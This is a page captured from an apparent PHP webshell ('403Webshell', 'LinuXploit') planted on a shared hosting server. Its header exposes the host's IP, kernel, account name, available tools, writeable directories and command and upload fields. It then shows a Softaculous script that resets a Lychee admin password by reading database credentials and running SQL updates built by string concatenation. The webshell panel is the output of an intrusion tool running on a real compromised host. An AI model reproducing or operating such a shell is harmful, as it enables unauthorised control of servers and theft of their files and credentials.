403Webshell
Server IP : 66.29.132.122  /  Your IP : 18.116.62.101
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/var/softaculous/lychee/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/var/softaculous/lychee//_edit.php
<?php

//////////////////////////////////////////////////////////////
//===========================================================
// edit.php(For individual softwares)
//===========================================================
// SOFTACULOUS 
// Version : 1.0
// Inspired by the DESIRE to be the BEST OF ALL
// ----------------------------------------------------------
// Started by: Alons
// Date:       10th Jan 2009
// Time:       21:00 hrs
// Site:       http://www.softaculous.com/ (SOFTACULOUS)
// ----------------------------------------------------------
// Please Read the Terms of use at http://www.softaculous.com
// ----------------------------------------------------------
//===========================================================
// (c)Softaculous Inc.
//===========================================================
//////////////////////////////////////////////////////////////

if(!defined('SOFTACULOUS')){

    die('Hacking Attempt');

}

/////////////////////////////////////////
// All functions in this PAGE must begin
// with TWO UNDERSCORE '__' to avoid 
// clashes with SOFTACULOUS Functions
// e.g. __funcname()
/////////////////////////////////////////

//////////////////////////////////////////
// Note : The path of the upgrade package 
//        is $software['path'].'/' . So to
//        access other files use 
//        $software['path'].'/other_file.ext'
//////////////////////////////////////////

//The Edit process
function __edit($installation){

global $__settings, $globals, $setupcontinue, $software, $error;
    
    $__settings = $installation;
    
    $__settings['admin_username'] = optPOST('admin_username');
    $__settings['admin_pass'] = optPOST('admin_pass');

    // Do we need to reset the password ?
    if(!empty($__settings['admin_pass'])){
    
        // We need the username
        if(empty($__settings['admin_username'])){
         $error[] = '{{err_no_username}}';
		return false;
        }
        
        // This is to get dbprefix from import.php
        sp_include_once($software['path'].'/import.php');
        
        $r = call_user_func('__import_'.$software['softname'], $__settings['softpath']);
        
        $__settings['dbprefix'] = $r['dbprefix'];
        $__settings['softdbhost'] = $r['softdbhost'];
        $__settings['softdbuser'] = $r['softdbuser'];
        $__settings['softdbpass'] = $r['softdbpass'];
        $__settings['softdb'] = $r['softdb'];
        
        if(!empty($error)){
		return false;
        }
        
        //This is to retrieve hashed value of admin username from the database 
        $query = "SELECT `value` FROM `".$__settings['dbprefix']."_lychee_settings` WHERE `key` = 'username';";
        
        $result = sdb_query($query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']);
        
        $__settings['admin_username_db'] = $result[0]['value'];
        
        //Creating crypted admin username hash
        $__settings['admin_username_crypt'] = crypt($__settings['admin_username'], $__settings['admin_username_db']);
		
        //Verifying admin username db hash with the crypted hash 
        if(!($__settings['admin_username_db'] === $__settings['admin_username_crypt'])){
		$error[] = '{{err_no_such_user}}';
		return false;           
        }else{          
		
		// This is to obtain password method from install.php
         sp_include_once($software['path'].'/install.php');      
		
		//We have commented the $user variable as it reassigns hash value for $__settings['admin_username']
         if(sversion_compare(phpversion(), '5.3', '<')){
			sconfigure('update_pass.php');  
			$data = swget($__settings['softurl'].'/update_pass.php');
			$data = explode('__softaculous__', $data);
			//$user = $data['0'];
			$pass = $data['1'];
			sunlink($__settings['softpath'].'/update_pass.php');
            }else{
			//$user = __getHashedString($__settings['admin_username']);                
			$pass = __getHashedString($__settings['admin_pass']);
            }
            
            $__settings['admin_pass'] = $pass;
            //$__settings['admin_username'] = $user;

            if(!empty($error)){
			return false;
            }
            
            // Update the password now
            $update_query = "UPDATE `".$__settings['dbprefix']."_lychee_settings` SET `value` = '".$__settings['admin_pass']."' WHERE `key` = 'password';";
            
            $result = sdb_query($update_query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']);			
        }
    
    }

}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit